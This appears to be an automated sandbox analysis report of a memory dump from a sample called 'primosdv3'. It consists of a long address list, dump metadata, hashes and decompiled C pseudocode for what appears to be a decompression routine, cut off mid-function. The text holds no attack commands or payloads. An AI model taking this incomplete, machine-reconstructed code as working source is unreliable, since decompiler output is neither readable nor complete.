0x00c762ca
0x00c762ca
0x00c762ca
0x00c762cd
0x00c762cd
0x00c762d3
0x00c762de
0x00000000
0x00c762e0
0x00c762e0
0x00000000
0x00c762e0
0x00c762e6
0x00c762e6
0x00c762ef
0x00c762f2
0x00000000
0x00000000
0x00c76301
0x00c76308
0x00c7690f
0x00c76911
0x00c76916
0x00c7691d
0x00c7691d
0x00c7630e
0x00c7630e
0x00c7630f
0x00c76312
0x00c76319
0x00000000
0x00000000
0x00c7631f
0x00c76327
0x00c76328
0x00c76329
0x00c7632a
0x00c76331
0x00000000
0x00c76333
0x00000000
0x00c76333
0x00c76331
0x00c76338
0x00c7633a
0x00c7633f
0x00c76341
0x00000000
0x00000000
0x00c76347
0x00c76347
0x00c76358
0x00c7635d
0x00c7639e
0x00c763a0
0x00c763a7
0x00c763ad
0x00c763b3
0x00c763ba
0x00c763ed
0x00c763ef
0x00c763f0
0x00c763f1
0x00c763f3
0x00c7640c
0x00c7640f
0x00c76416
0x00c76419
0x00c7641f
0x00c76423
0x00c7642f
0x00c7643b
0x00c7643d
0x00c76443
0x00c76445
0x00c76445
0x00c76447
0x00c7644f
0x00000000
0x00c763f5
0x00c763f8
0x00c763fb
0x00c763fb
0x00c763fb
0x00c763fd
0x00c7640a
0x00c7640a
0x00c7640a
0x00c763ff
0x00c763ff
0x00c76400
0x00c76403
0x00c76406
0x00000000
0x00c76408
0x00000000
0x00c76408
0x00c76406
0x00000000
0x00c763fb
0x00c763bc
0x00c763be
0x00c763c1
0x00c763cb
0x00c763d3
0x00c763d6
0x00c763d9
0x00c763dc
0x00c763df
0x00c763e7
0x00c76453
0x00c76453
0x00c7645b
0x00c7645d
0x00c7649d
0x00c7649d
0x00c764a3
0x00c768e6
0x00c768e6
0x00c768e8
0x00c76920
0x00c76920
0x00c76926
0x00c76aab
0x00c76aab
0x00c76aab
0x00c76ab4
0x00c76ab7
0x00c76ab9
0x00c76abd
0x00c76acc
0x00c76ace
0x00c76ad1
0x00c76ad8
0x00c76ade
0x00c76ae4
0x00c76aeb
0x00c76b1b
0x00c76b1d
0x00c76b1e
0x00c76b1f
0x00c76b21
0x00c76b3d
0x00c76b40
0x00c76b44
0x00c76b47
0x00c76b4a
0x00c76b4d
0x00c76b57
0x00c76b5d
0x00c76b69
0x00c76b6b
0x00c76b71
0x00c76b73
0x00c76b73
0x00c76b75
0x00c76b7d
0x00c76b7d
0x00c76b80
0x00c76b83
0x00c76b95
0x00c76b9a
0x00c76b9d
0x00c76b9f
0x00c76ba3
0x00c76baa
0x00c76bb3
0x00c76bb5
0x00c76bbc
0x00c76bbf
0x00c76bbf
0x00c76bc2
0x00c76bc2
0x00c76b85
0x00c76b85
0x00c76b85
0x00c76bc5
0x00c76bcc
0x00c76bd0
0x00c76bd3
0x00c76be5
0x00c76be5
0x00c76bf0
0x00c76bf2
0x00c76bf7
0x00c76bf9
0x00000000
0x00000000
0x00c76bff
0x00c76bff
0x00c76c01
0x00000000
0x00000000
0x00c76c07
0x00c76c07
0x00c76c0d
0x00c76c11
0x00c76c17
0x00c76c18
0x00c76c1b
0x00c76c1d
0x00c769fc
0x00c769fc
0x00c769ff
0x00c76a01
0x00c768a1
0x00c768a1
0x00000000
0x00c768a1
0x00c76a07
0x00c76a09
0x00c76a0c
0x00c76a0f
0x00c76a12
0x00000000
0x00000000
0x00c76a18
0x00c76a1b
0x00c76a1e
0x00c76a21
0x00c76a24
0x00000000
0x00000000
0x00c76a2a
0x00c76a2d
0x00c76a30
0x00c76a33
0x00c76a36
0x00000000
0x00000000
0x00c76a3c
0x00c76a3f
0x00c76a42
0x00c76a45
0x00c76a48
0x00000000
0x00000000
0x00c76a4e
0x00c76a51
0x00c76a54
0x00c76a57
0x00c76a5a
0x00000000
0x00000000
0x00c76a60
0x00c76a63
0x00c76a66
0x00c76a69
0x00c76a6c
0x00000000
0x00000000
0x00c76a72
0x00c76a72
0x00c76a75
0x00000000
0x00c76a75
0x00c76c23
0x00c76c23
0x00c76c25
0x00c76c6b
0x00c76c6d
0x00c76c6d
0x00c76c70
0x00c76c74
0x00c76c76
0x00c76c76
0x00c76c79
0x00c76c7e
0x00c76c83
0x00c76c84
0x00c76c86
0x00c76c88
0x00c76c8a
0x00c76c8a
0x00c76c8a
0x00c769f8
0x00c769f8
0x00000000
0x00c769f8
0x00c76c27
0x00c76c29
0x00c76c29
0x00c76c2c
0x00c76c2c
0x00c76c2e
0x00c76c30
0x00c76c36
0x00c76c3c
0x00c76c42
0x00c76c48
0x00c76c4e
0x00c76c54
0x00c76c57
0x00c76c5a
0x00c76c5c
0x00c76c5f
0x00c76c61
0x00c76c61
0x00c76c61
0x00000000
0x00c76bd5
0x00c76bd5
0x00c76bd5
0x00c76bde
0x00c76bdf
0x00c7678e
0x00c7678e
0x00c76795
0x00c762ca
0x00c762ca
0x00c762ca
0x00c762ca
0x00c762cd
0x00c762cd
0x00000000
0x00c76c94
0x00c76c94
0x00c76c97
0x00c76c97
0x00c76c9f
0x00c76ca5
0x00c76ca5
0x00c76cab
0x00c76cad
0x00c76cb1
0x00c76cb7
0x00c76cbe
0x00c76cc0
0x00c76cc3
0x00c76cc3
0x00c76cc3
0x00c76cc8
0x00c76ccb
0x00c762ca
0x00c762ca
0x00c762ca
0x00c762ca
0x00c762ca
0x00c762cd
0x00c762d3
0x00c762de
0x00000000
0x00c762e0
0x00c762e0
0x00000000
0x00c762e0
0x00c762de
0x00c768fb
0x00c76902
0x00c76907
0x00c76907
0x00000000
0x00c768a9
0x00c768a9
0x00c768ac
0x00c768ac
0x00c768b4
0x00c768ba
0x00c768be
0x00c768be
0x00c768c4
0x00c768c6
0x00c768ca
0x00c768d0
0x00c768d7
0x00c768d9
0x00c768dc
0x00c768dc
0x00c768dc
0x00000000
0x00c768e1
0x00c762ca
0x00c76bd3
0x00c76b23
0x00c76b29
0x00c76b2c
0x00c76b2c
0x00c76b2c
0x00c76b2e
0x00000000
0x00000000
0x00c76b30
0x00c76b30
0x00c76b31
0x00c76b34
0x00c76b37
0x00000000
0x00000000
0x00c76b39
0x00000000
0x00c76b39
0x00c76b3b
0x00c76b3b
0x00000000
0x00c76b3b
0x00c76aed
0x00c76aef
0x00c76af2
0x00c76afc
0x00c76b04
0x00c76b07
0x00c76b0a
0x00c76b0d
0x00c76b15
0x00000000
0x00000000
0x00000000
0x00000000
0x00c76abf
0x00c76abf
0x00c76ac2
0x00c76ac4
0x00c76ac7
0x00c76ac7
0x00c76ac7
0x00000000
0x00c76abf
0x00c7692c
0x00c7692c
0x00c7692f
0x00c76931
0x00c762ca
0x00c762ca
0x00c762ca
0x00c762ca
0x00000000
0x00c762ca
0x00c762ca
0x00c76937
0x00c76937
0x00c7693e
0x00c76952
0x00c76952
0x00c7695d
0x00c76960
0x00c76965
0x00c76967
0x00c76969
0x00c76a7d
0x00c76a7d
0x00c76a83
0x00c76a83
0x00c76a89
0x00c76a8b
0x00c76a8f
0x00c76a95
0x00c76a9c
0x00c76a9e
0x00c76aa1
0x00c76aa1
0x00c76aa1
0x00000000
0x00c76aa6
0x00c7696f
0x00c7696f
0x00c76971
0x00000000
0x00000000
0x00c76977
0x00c76977
0x00c7697d
0x00c76981
0x00c76987
0x00c76988
0x00c7698b
0x00c7698d
0x00000000
0x00000000
0x00c7698f
0x00c7698f
0x00c76991
0x00c769d4
0x00c769d6
0x00c769d6
0x00c769d9
0x00c769dd
0x00c769df
0x00c769df
0x00c769e2
0x00c769e7
0x00c769ec
0x00c769ed
0x00c769ef
0x00c769f1
0x00c769f3
0x00c769f3
0x00c769f3
0x00000000
0x00c769df
0x00c76993
0x00c76995
0x00c76995
0x00c76998
0x00c76998
0x00c7699a
0x00c7699c
0x00c769a2
0x00c769a8
0x00c769ae
0x00c769b4
0x00c769ba
0x00c769c0
0x00c769c3
0x00c769c6
0x00c769c8
0x00c769cb
0x00c769cd
0x00c769cd
0x00c769cd
0x00000000
0x00c769d2
0x00c76940
0x00c76940
0x00c76949
0x00c7694a
0x00000000
0x00c7694a
0x00c768ea
0x00c768f0
0x00c768f2
0x00c768f7
0x00c768f9
0x00000000
0x00000000
0x00000000
0x00c768f9
0x00c764a9
0x00c764a9
0x00c764af
0x00c764b2
0x00c764c8
0x00c764cb
0x00c764d1
0x00c764d4
0x00c764d6
0x00c764da
0x00c764df
0x00c764e5
0x00c764f0
0x00c764f7
0x00c764f9
0x00c764f9
0x00c764fc
0x00c76500
0x00c76503
0x00c76503
0x00c764b4
0x00c764b4
0x00c764b8
0x00c764b8
0x00c76508
0x00c7650f
0x00c76515
0x00c7651b
0x00c76522
0x00c76561
0x00c76563
0x00c76564
0x00c76565
0x00c76567
0x00c76583
0x00c76586
0x00c7658a
0x00c7658d
0x00c76593
0x00c7659d
0x00c765a0
0x00c765a6
0x00c765a9
0x00c765b6
0x00c765b8
0x00c765be
0x00c765c0
0x00c765c0
0x00c765c2
0x00000000
0x00c765c2
0x00c76569
0x00c7656f
0x00c76572
0x00c76572
0x00c76572
0x00c76574
0x00000000
0x00000000
0x00c76576
0x00c76576
0x00c76577
0x00c7657a
0x00c7657d
0x00000000
0x00000000
0x00c7657f
0x00000000
0x00c7657f
0x00c76581
0x00c76581
0x00000000
0x00c76524
0x00c76524
0x00c76526
0x00c76529
0x00c7652b
0x00c76537
0x00c7653e
0x00c76542
0x00c76545
0x00c76549
0x00c76550
0x00c76553
0x00c76557
0x00c765ca
0x00c765ca
0x00c765cd
0x00c765d0
0x00c765da
0x00c765e4
0x00c765e9
0x00c765ea
0x00c765ee
0x00c765f0
0x00c765f4
0x00c765f6
0x00c76744
0x00c76744
0x00c76747
0x00c76747
0x00c7674d
0x00c7674f
0x00c76750
0x00c76756
0x00c76758
0x00c76759
0x00c7675f
0x00c76761
0x00c76761
0x00c76761
0x00c7675f
0x00c76756
0x00c76765
0x00c7676b
0x00c76771
0x00c76774
0x00c76777
0x00c7677e
0x00c76781
0x00c7679f
0x00c7679f
0x00c767aa
0x00c767ac
0x00c767b1
0x00c767b5
0x00c767b7
0x00000000
0x00000000
0x00c767bd
0x00c767bd
0x00c767bf
0x00000000
0x00000000
0x00c767c5
0x00c767c5
0x00c767cd
0x00c767d0
0x00c767d6
0x00c767d7
0x00c767da
0x00c767dc
0x00c767de
0x00c76856
0x00c76856
0x00c76858
0x00c7685c
0x00c7685f
0x00c76862
0x00c76867
0x00c7686a
0x00c7686d
0x00c76872
0x00c76875
0x00c76878
0x00c7687d
0x00c76880
0x00c76883
0x00c76888
0x00c7688b
0x00c7688e
0x00c76893
0x00c76896
0x00c76899
0x00c7689e
0x00c7689e
0x00c76899
0x00c7688e
0x00c76883
0x00c76878
0x00c7686d
0x00c76862
0x00000000
0x00c76858
0x00c767e0
0x00c767e0
0x00c767e4
0x00c7682a
0x00c7682c
0x00c7682c
0x00c7682f
0x00c76833
0x00c76835
0x00c76835
0x00c76838
0x00c7683d
0x00c76842
0x00c76843
0x00c76845
0x00c76847
0x00c76849
0x00c76849
0x00c76849
0x00c7684e
0x00c76852
0x00000000
0x00c76852
0x00c767e6
0x00c767e8
0x00c767e8
0x00c767eb
0x00c767eb
0x00c767ed
0x00c767ef
0x00c767f5
0x00c767fb
0x00c76801
0x00c76807
0x00c7680d
0x00c76813
0x00c76816
0x00c76819
0x00c7681b
0x00c7681e
0x00c76820
0x00c76820
0x00c76820
0x00c76825
0x00000000
0x00c76783
0x00c76783
0x00c76783
0x00c7678c
0x00c7678d
0x00000000
0x00c7678d
0x00c76781
0x00c765fc
0x00c765fc
0x00c765ff
0x00c7670e
0x00c76711
0x00c7671a
0x00c76723
0x00c76727
0x00c7672b
0x00c76732
0x00c7673c
0x00c7673f
0x00000000
0x00c7673f
0x00c76605
0x00c76605
0x00c76649
0x00c76607
0x00c7660a
0x00c76617
0x00c76626
0x00c7662a
0x00c7662e
0x00c76634
0x00c76636
0x00c76639
0x00c7663d
0x00c76640
0x00c76644
0x00c76644
0x00c7664e
0x00c76655
0x00c7665b
0x00c76661
0x00c76668
0x00c76699
0x00c7669b
0x00c7669c
0x00c7669d
0x00c766a1
0x00c766a3
0x00c766c1
0x00c766c4
0x00c766d0
0x00c766d3
0x00c766d7
0x00c766dc
0x00c766ef
0x00c766f1
0x00c766f7
0x00c766f9
0x00c766f9
0x00c766fb
0x00000000
0x00c766fb
0x00c766a5
0x00c766ab
0x00c766ae
0x00c766ae
0x00c766ae
0x00c766b0
0x00000000
0x00000000
0x00c766b2
0x00c766b2
0x00c766b3
0x00c766b6
0x00c766b9
0x00000000
0x00000000
0x00c766bb
0x00000000
0x00c766bb
0x00c766bd
0x00c766bd
0x00000000
0x00c7666a
0x00c7666a
0x00c7666c
0x00c7666f
0x00c76679
0x00c76689
0x00c7668c
0x00c7668f
0x00c76703
0x00c76706
0x00c76706
0x00c76708
0x00c76708
0x00000000
0x00c76708
0x00c76668
0x00c765d2
0x00c765d2
0x00000000
0x00c765d2
0x00c76522
0x00c7645f
0x00c7645f
0x00c76466
0x00c76490
0x00c76493
0x00c76496
0x00000000
0x00c76468
0x00c76475
0x00c76480
0x00000000
0x00c76480
0x00c76466
0x00c763ba
0x00c7635f
0x00c7635f
0x00c76362
0x00000000
0x00000000
0x00c76364
0x00c76366
0x00c7636b
0x00c76371
0x00c76377
0x00000000
0x00000000
0x00c7637d
0x00c7637d
0x00c76391
0x00c76391
0x00c76398
0x00c76cd0
0x00c76cd0
0x00000000
0x00c76cd0
0x00000000
0x00c76398
0x00c7637f
0x00c7637f
0x00c76385
0x00c7638b
0x00000000
0x00000000
0x00000000
0x00c7638b
0x00c762cd

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
Instruction ID: 5e4fdeb3e01d60411ca338a293701f16d89b93335ec487b2f5d7ed9ac0eb448b
Opcode Fuzzy Hash: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
Instruction Fuzzy Hash: 3B62C471604B859FCB25CF28C4906B9BBE1AF95304F08C96DE8EE8B346D734EA45DB11

Uniqueness

Uniqueness Score: -1.00%

Function 00C777EF Relevance: .8, Instructions: 817
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00C777EF(signed int __ecx) {
				signed int _t363;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t373;
				signed int _t374;
				signed int _t375;
				signed int _t376;
				signed int _t377;
				signed int _t378;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				void* _t385;
				signed int _t388;
				signed int _t389;
				intOrPtr _t391;
				signed int _t401;
				char _t410;
				unsigned int _t411;
				void* _t421;
				signed int _t422;
				signed int _t423;
				intOrPtr _t425;
				signed int _t428;
				char _t437;
				signed int _t439;
				signed int _t441;
				signed int _t444;
				signed int* _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t452;
				signed int _t453;
				signed int _t454;
				signed int _t457;
				void* _t462;
				signed int _t463;
				signed int _t464;
				intOrPtr _t466;
				signed int _t469;
				char _t478;
				unsigned int _t479;
				signed int* _t483;
				signed int _t484;
				signed int _t485;
				signed int _t486;
				signed int _t491;
				signed int _t492;
				signed short _t493;
				unsigned int _t499;
				signed int _t500;
				signed int* _t506;
				unsigned int _t507;
				intOrPtr _t520;
				intOrPtr* _t521;
				intOrPtr _t523;
				signed int* _t524;
				signed int _t525;
				intOrPtr _t526;
				signed int _t528;
				void* _t529;
				signed int _t532;
				signed int* _t534;
				unsigned int _t537;
				signed int _t538;
				void* _t539;
				signed int _t542;
				signed int _t544;
				signed int _t547;
				void* _t549;
				unsigned int _t552;
				signed int _t553;
				intOrPtr* _t555;
				void* _t556;
				signed int _t559;
				signed int _t560;
				signed int _t561;
				signed int _t564;
				signed int* _t569;
				void* _t570;
				signed int _t573;
				signed int _t575;
				signed int _t577;
				signed int _t580;
				void* _t582;
				unsigned int _t585;
				signed int _t586;
				signed int _t588;
				signed int _t590;
				void* _t592;
				signed int _t595;
				intOrPtr* _t597;
				void* _t598;
				signed int _t601;
				void* _t604;
				signed int _t607;
				signed int _t608;
				intOrPtr* _t610;
				void* _t611;
				signed int _t614;
				signed int _t615;
				void* _t617;
				signed int _t620;
				intOrPtr* _t623;
				void* _t624;
				signed int _t628;
				unsigned int _t630;
				signed int _t633;
				signed int _t634;
				signed int _t635;
				unsigned int _t637;
				signed int _t640;
				void* _t643;
				signed int* _t644;
				signed int _t645;
				signed int _t646;
				void* _t649;
				unsigned int _t651;
				signed int _t654;
				signed int _t658;
				void* _t661;
				signed int* _t662;
				unsigned int _t664;
				signed int _t667;
				signed int _t669;
				signed int _t670;
				signed int _t671;
				intOrPtr* _t672;
				signed int _t673;
				signed int* _t674;
				signed int _t676;
				signed int _t677;
				unsigned int _t681;
				signed int _t682;
				signed int _t686;
				signed int _t687;
				signed int _t688;
				signed int _t689;
				signed int* _t690;
				signed int* _t691;
				signed int* _t692;
				signed int _t694;
				unsigned int _t696;
				signed int _t697;
				signed int _t698;
				signed int* _t699;
				signed int _t702;
				signed int _t704;
				signed int _t705;
				signed int _t707;
				signed int _t709;
				char* _t710;
				signed int _t711;
				unsigned int _t713;
				signed int _t714;
				signed int _t715;
				signed int _t716;
				signed int _t723;
				signed int _t724;
				void* _t725;

				_t520 =  *((intOrPtr*)(_t725 + 0x40));
				_t686 = __ecx;
				_t692 = _t520 + 4;
				 *(_t725 + 0x24) = __ecx;
				_t672 = _t520 + 0x18;
				 *(_t725 + 0x10) = _t692;
				if( *((char*)(_t520 + 0x2c)) != 0) {
					 *(_t725 + 0x10) = _t692;
					L4:
					_t523 =  *_t672;
					if( *_t692 <=  *((intOrPtr*)(_t520 + 0x24)) + _t523) {
						_t363 =  *((intOrPtr*)(_t520 + 0x20)) - 1 + _t523;
						_t694 =  *((intOrPtr*)(_t520 + 0x4acc)) - 0x10;
						 *(_t725 + 0x18) = _t363;
						 *(_t725 + 0x14) = _t694;
						 *(_t725 + 0x2c) = _t363;
						__eflags = _t363 - _t694;
						if(_t363 >= _t694) {
							 *(_t725 + 0x2c) = _t694;
						}
						_t524 =  *(_t725 + 0x10);
						while(1) {
							_t673 =  *(_t686 + 0xe6dc);
							_t628 =  *(_t686 + 0x7c) & _t673;
							 *(_t686 + 0x7c) = _t628;
							_t525 =  *_t524;
							__eflags = _t525 -  *(_t725 + 0x2c);
							if(_t525 <  *(_t725 + 0x2c)) {
								goto L19;
							}
							L13:
							__eflags = _t525 - _t363;
							if(__eflags > 0) {
								L145:
								return 1;
							}
							if(__eflags != 0) {
								L16:
								__eflags = _t525 - _t705;
								if(_t525 < _t705) {
									L18:
									__eflags = _t525 -  *((intOrPtr*)(_t520 + 0x4acc));
									if(_t525 >=  *((intOrPtr*)(_t520 + 0x4acc))) {
										L144:
										 *((char*)(_t520 + 0x4ad3)) = 1;
										goto L145;
									}
									goto L19;
								}
								__eflags =  *((char*)(_t520 + 0x4ad2));
								if( *((char*)(_t520 + 0x4ad2)) == 0) {
									goto L144;
								}
								goto L18;
							}
							__eflags =  *((intOrPtr*)(_t520 + 8)) -  *((intOrPtr*)(_t520 + 0x1c));
							if( *((intOrPtr*)(_t520 + 8)) >=  *((intOrPtr*)(_t520 + 0x1c))) {
								goto L145;
							}
							goto L16;
							L19:
							_t526 =  *((intOrPtr*)(_t686 + 0x4b3c));
							__eflags = (_t526 - _t628 & _t673) - 0x1004;
							if((_t526 - _t628 & _t673) >= 0x1004) {
								L24:
								_t674 =  *(_t725 + 0x10);
								_t367 = E00C6A89D(_t674);
								_t368 =  *(_t520 + 0xb4);
								_t630 = _t367 & 0x0000fffe;
								__eflags = _t630 -  *((intOrPtr*)(_t520 + 0x34 + _t368 * 4));
								if(_t630 >=  *((intOrPtr*)(_t520 + 0x34 + _t368 * 4))) {
									_t528 = 0xf;
									_t369 = _t368 + 1;
									 *(_t725 + 0x28) = _t528;
									__eflags = _t369 - _t528;
									if(_t369 >= _t528) {
										L32:
										_t696 = _t674[1] + _t528;
										_t697 = _t696 & 0x00000007;
										 *_t674 =  *_t674 + (_t696 >> 3);
										 *(_t725 + 0x1c) =  *_t674;
										_t373 =  *(_t725 + 0x28);
										_t674[1] = _t697;
										_t529 = 0x10;
										_t532 =  *((intOrPtr*)(_t520 + 0x74 + _t373 * 4)) + (_t630 -  *((intOrPtr*)(_t520 + 0x30 + _t373 * 4)) >> _t529 - _t373);
										__eflags = _t532 -  *((intOrPtr*)(_t520 + 0x30));
										asm("sbb eax, eax");
										_t374 = _t373 & _t532;
										__eflags = _t374;
										_t524 =  *(_t725 + 0x10);
										_t633 =  *(_t520 + 0xcb8 + _t374 * 2) & 0x0000ffff;
										_t375 =  *(_t725 + 0x1c);
										L33:
										_t634 = _t633 & 0x0000ffff;
										__eflags = _t634 - 0x100;
										if(_t634 >= 0x100) {
											__eflags = _t634 - 0x106;
											if(_t634 < 0x106) {
												__eflags = _t634 - 0x100;
												if(_t634 != 0x100) {
													__eflags = _t634 - 0x101;
													if(_t634 != 0x101) {
														_t635 = _t634 + 0xfffffefe;
														__eflags = _t635;
														_t534 = _t686 + (_t635 + 0x18) * 4;
														_t698 =  *_t534;
														 *(_t725 + 0x28) = _t698;
														if(_t635 == 0) {
															L117:
															 *(_t686 + 0x60) = _t698;
															_t699 =  *(_t725 + 0x10);
															_t376 = E00C6A89D(_t699);
															_t377 =  *(_t520 + 0x2d78);
															_t637 = _t376 & 0x0000fffe;
															__eflags = _t637 -  *((intOrPtr*)(_t520 + 0x2cf8 + _t377 * 4));
															if(_t637 >=  *((intOrPtr*)(_t520 + 0x2cf8 + _t377 * 4))) {
																_t676 = 0xf;
																_t378 = _t377 + 1;
																__eflags = _t378 - _t676;
																if(_t378 >= _t676) {
																	L125:
																	_t537 = _t699[1] + _t676;
																	_t538 = _t537 & 0x00000007;
																	_t699[1] = _t538;
																	 *_t699 =  *_t699 + (_t537 >> 3);
																	_t381 =  *_t699;
																	 *(_t725 + 0x34) = _t538;
																	_t539 = 0x10;
																	 *(_t725 + 0x30) = _t381;
																	_t542 =  *((intOrPtr*)(_t520 + 0x2d38 + _t676 * 4)) + (_t637 -  *((intOrPtr*)(_t520 + 0x2cf4 + _t676 * 4)) >> _t539 - _t676);
																	__eflags = _t542 -  *((intOrPtr*)(_t520 + 0x2cf4));
																	asm("sbb eax, eax");
																	_t382 = _t381 & _t542;
																	__eflags = _t382;
																	_t383 =  *(_t520 + 0x397c + _t382 * 2) & 0x0000ffff;
																	L126:
																	_t677 = _t383 & 0x0000ffff;
																	__eflags = _t677 - 8;
																	if(_t677 >= 8) {
																		_t702 = (_t677 >> 2) - 1;
																		_t681 = ((_t677 & 0x00000003 | 0x00000004) << _t702) + 2;
																		__eflags = _t702;
																		if(_t702 != 0) {
																			_t411 = E00C6A89D( *(_t725 + 0x10));
																			_t644 =  *(_t725 + 0x10);
																			_t549 = 0x10;
																			_t681 = _t681 + (_t411 >> _t549 - _t702);
																			_t552 =  *(_t725 + 0x34) + _t702;
																			_t553 = _t552 & 0x00000007;
																			__eflags = _t553;
																			 *_t644 = (_t552 >> 3) +  *(_t725 + 0x30);
																			_t644[1] = _t553;
																		}
																	} else {
																		_t681 = _t677 + 2;
																	}
																	_t640 =  *(_t686 + 0x7c);
																	_t544 =  *(_t725 + 0x28);
																	_t385 =  *((intOrPtr*)(_t686 + 0xe6d8)) + 0xffffeffc;
																	_t704 = _t640 - _t544;
																	 *(_t686 + 0x74) = _t681;
																	__eflags = _t704 - _t385;
																	if(_t704 >= _t385) {
																		L140:
																		_t524 =  *(_t725 + 0x10);
																		_t363 =  *(_t725 + 0x18);
																		__eflags = _t681;
																		if(_t681 == 0) {
																			goto L11;
																		}
																		_t388 =  *(_t686 + 0xe6dc);
																		do {
																			_t389 = _t388 & _t704;
																			_t704 = _t704 + 1;
																			 *((char*)( *((intOrPtr*)(_t686 + 0x4b40)) + _t640)) =  *((intOrPtr*)(_t389 +  *((intOrPtr*)(_t686 + 0x4b40))));
																			_t388 =  *(_t686 + 0xe6dc);
																			_t640 =  *(_t686 + 0x7c) + 0x00000001 & _t388;
																			 *(_t686 + 0x7c) = _t640;
																			_t681 = _t681 - 1;
																			__eflags = _t681;
																		} while (_t681 != 0);
																		goto L35;
																	} else {
																		__eflags = _t640 - _t385;
																		if(_t640 >= _t385) {
																			goto L140;
																		}
																		_t391 =  *((intOrPtr*)(_t686 + 0x4b40));
																		_t521 = _t391 + _t704;
																		_t710 = _t391 + _t640;
																		_t643 = 8;
																		 *(_t686 + 0x7c) = _t640 + _t681;
																		__eflags = _t681 - _t643;
																		if(_t681 < _t643) {
																			L84:
																			_t363 =  *(_t725 + 0x18);
																			_t524 =  *(_t725 + 0x10);
																			__eflags = _t681;
																			if(_t681 == 0) {
																				L10:
																				_t520 =  *((intOrPtr*)(_t725 + 0x4c));
																				L11:
																				_t705 =  *(_t725 + 0x14);
																				continue;
																				do {
																					do {
																						_t673 =  *(_t686 + 0xe6dc);
																						_t628 =  *(_t686 + 0x7c) & _t673;
																						 *(_t686 + 0x7c) = _t628;
																						_t525 =  *_t524;
																						__eflags = _t525 -  *(_t725 + 0x2c);
																						if(_t525 <  *(_t725 + 0x2c)) {
																							goto L19;
																						}
																						goto L13;
																					} while (_t681 == 0);
																					_t646 =  *(_t686 + 0x7c);
																					_t561 =  *(_t686 + 0x60);
																					_t421 =  *((intOrPtr*)(_t686 + 0xe6d8)) + 0xffffeffc;
																					_t709 = _t646 - _t561;
																					__eflags = _t709 - _t421;
																					if(_t709 >= _t421) {
																						L112:
																						_t422 =  *(_t686 + 0xe6dc);
																						do {
																							_t423 = _t422 & _t709;
																							_t709 = _t709 + 1;
																							 *((char*)( *((intOrPtr*)(_t686 + 0x4b40)) + _t646)) =  *((intOrPtr*)(_t423 +  *((intOrPtr*)(_t686 + 0x4b40))));
																							_t422 =  *(_t686 + 0xe6dc);
																							_t646 =  *(_t686 + 0x7c) + 0x00000001 & _t422;
																							 *(_t686 + 0x7c) = _t646;
																							_t681 = _t681 - 1;
																							__eflags = _t681;
																						} while (_t681 != 0);
																						L35:
																						_t524 =  *(_t725 + 0x10);
																						_t363 =  *(_t725 + 0x18);
																						goto L11;
																					}
																					__eflags = _t646 - _t421;
																					if(_t646 >= _t421) {
																						goto L112;
																					}
																					_t425 =  *((intOrPtr*)(_t686 + 0x4b40));
																					_t521 = _t425 + _t709;
																					_t710 = _t425 + _t646;
																					_t649 = 8;
																					 *(_t686 + 0x7c) = _t646 + _t681;
																					__eflags = _t681 - _t649;
																					if(_t681 < _t649) {
																						goto L84;
																					}
																					__eflags = _t561 - _t681;
																					if(_t561 >= _t681) {
																						_t428 = _t681 >> 3;
																						__eflags = _t428;
																						 *(_t725 + 0x34) = _t428;
																						_t688 = _t428;
																						do {
																							E00C80320(_t710, _t521, _t649);
																							_t725 = _t725 + 0xc;
																							_t649 = 8;
																							_t521 = _t521 + _t649;
																							_t710 = _t710 + _t649;
																							_t681 = _t681 - _t649;
																							_t688 = _t688 - 1;
																							__eflags = _t688;
																						} while (_t688 != 0);
																						L83:
																						_t686 =  *(_t725 + 0x24);
																						goto L84;
																					}
																					_t564 = _t681 >> 3;
																					__eflags = _t564;
																					do {
																						_t681 = _t681 - _t649;
																						 *_t710 =  *_t521;
																						 *((char*)(_t710 + 1)) =  *((intOrPtr*)(_t521 + 1));
																						 *((char*)(_t710 + 2)) =  *((intOrPtr*)(_t521 + 2));
																						 *((char*)(_t710 + 3)) =  *((intOrPtr*)(_t521 + 3));
																						 *((char*)(_t710 + 4)) =  *((intOrPtr*)(_t521 + 4));
																						 *((char*)(_t710 + 5)) =  *((intOrPtr*)(_t521 + 5));
																						 *((char*)(_t710 + 6)) =  *((intOrPtr*)(_t521 + 6));
																						_t437 =  *((intOrPtr*)(_t521 + 7));
																						_t521 = _t521 + _t649;
																						 *((char*)(_t710 + 7)) = _t437;
																						_t710 = _t710 + _t649;
																						_t564 = _t564 - 1;
																						__eflags = _t564;
																					} while (_t564 != 0);
																					goto L84;
																					L92:
																					_t524 =  *(_t725 + 0x10);
																					_t705 =  *(_t725 + 0x14);
																					_t363 =  *(_t725 + 0x18);
																					__eflags = _t681;
																				} while (_t681 == 0);
																				_t463 =  *(_t686 + 0xe6dc);
																				_t716 =  *(_t725 + 0x34);
																				do {
																					_t464 = _t463 & _t716;
																					_t716 = _t716 + 1;
																					 *((char*)( *((intOrPtr*)(_t686 + 0x4b40)) + _t658)) =  *((intOrPtr*)(_t464 +  *((intOrPtr*)(_t686 + 0x4b40))));
																					_t463 =  *(_t686 + 0xe6dc);
																					_t658 =  *(_t686 + 0x7c) + 0x00000001 & _t463;
																					 *(_t686 + 0x7c) = _t658;
																					_t681 = _t681 - 1;
																					__eflags = _t681;
																				} while (_t681 != 0);
																				goto L35;
																			}
